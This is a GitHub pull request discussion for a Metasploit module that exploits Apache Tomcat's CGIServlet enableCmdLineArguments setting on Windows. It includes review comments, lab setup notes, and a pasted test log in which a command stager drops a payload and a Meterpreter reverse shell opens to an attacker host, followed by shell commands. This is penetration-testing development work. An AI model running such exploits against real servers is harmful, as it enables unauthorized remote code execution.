Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability #11990
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
timwr
reviewed
Jun 18, 2019
h00die
reviewed
Jun 19, 2019
|
I wouldn't mind taking this one,if you had someone else in mind or it was a priority feel free to replace me. |
|
Not a priority. Please take your time. Thanks! |
jrobles-r7
reviewed
Jun 19, 2019
h00die
reviewed
Jun 21, 2019
| * 8.5.0 to 8.5.39 | ||
| * 7.0.0 to 7.0.93 | ||
|
|
||
| Also, the machine needs to enable the enableCmdLineArguments option in web.xml. For example: |
There was a problem hiding this comment.
conf\web.xml (i like to wrap file names and paths in ticks)
Your bundle also includes that change. I attempted exploit against my own custom install and its failing (most likely a typo or user error on my behalf), but that instruction wasn't in the docs, but is required right? |
|
Yes I have that set to true. |
|
Your bundle worked, still trying to figure out why my manual didn't (so the docs can be adjusted if need be) |
|
worked on 8.5.20 as well on my server 2012 box. |
h00die
requested changes
Jun 25, 2019
documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
Outdated
Show resolved
Hide resolved
| 6. Run the module, you should get a session. | ||
|
|
||
| ## Scenarios | ||
|
|
There was a problem hiding this comment.
### Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)
|
|
||
| * Windows 10 Pro (x64) | ||
| * Apache Tomcat 9.0.17 | ||
| * JDK 8 |
There was a problem hiding this comment.
remove this addition infavor of the h3 commented above
| * Apache Tomcat 9.0.17 | ||
| * JDK 8 | ||
|
|
||
| ### Check Method |
| [+] 172.16.135.141:8080 - The target is vulnerable. | ||
| ``` | ||
|
|
||
| ### Code Execution |
documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
Outdated
Show resolved
Hide resolved
| meterpreter > | ||
| [!] Make sure to manually cleanup the exe generated by the exploit | ||
| ``` | ||
|
|
There was a problem hiding this comment.
Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2019-06-24 20:44:19 -0400 %SystemDrive%
100777/rwxrwxrwx 73802 fil 2019-06-24 20:44:19 -0400 dKASF.exe
100777/rwxrwxrwx 67 fil 2019-06-20 21:52:49 -0400 example.bat
100777/rwxrwxrwx 69 fil 2019-06-24 15:15:13 -0400 test.bat
meterpreter > sysinfo
Computer : WIN-EDKFSE5QPAB
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME: "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built: Aug 2 2017 21:35:49 UTC
Server number: 8.5.20.0
OS Name: Windows Server 2012
OS Version: 6.2
Architecture: amd64
JVM Version: 1.8.0_211-b12
JVM Vendor: Oracle Corporation
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>
|
Ok. Awesome. I'll make the changes today. Thanks for testing! |
|
There's a few minor doc things, but honestly it'll take me less time to change it when landing. Should be able to wrap this up over the weekend! |
h00die
added a commit
that referenced
this pull request
Jul 1, 2019
Release NotesThis PR adds an exploit for Apache Tomcat on Windows when the cmdlineargs is configured (non-default) |
jmartin-tech
pushed a commit
that referenced
this pull request
Jul 23, 2019
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Description
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.
Setup
Prepare a Windows box with JDK8 on it. You also want to make sure the box has the JAVA_HOME environment variable configured. For example:
To help you speed up the process, I have uploaded the actual vulnerable tomcat setup that you can use:
apache-tomcat-9.0.17.zip
To use it, simply download and extract it on the Windows machine. Go to the bin directory and execute the startup.bat file.
Note that I also created a debugging port for this tomcat on 4000, so if you want, you can attach IntelliJ and observe the tomcat internals more for analysis reasons.
The cgi script should be located at: http://IP:8080/cgi/test.bat
Verification
Demo: